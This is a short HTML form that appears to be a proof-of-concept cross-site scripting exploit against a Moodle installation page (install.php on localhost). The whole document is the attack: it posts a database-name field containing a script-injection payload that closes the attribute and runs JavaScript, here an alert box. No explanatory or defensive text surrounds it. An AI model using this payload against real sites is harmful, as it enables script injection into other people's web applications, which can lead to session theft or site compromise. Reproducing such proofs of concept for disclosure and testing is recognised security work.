<form method="post" action="http://localhost/moodle/install.php">
<input type="hidden" name="stage" value="3">
<input type="text" name="dbname" value='"><script>alert(1)</script>'>
<input type=submit>
</form>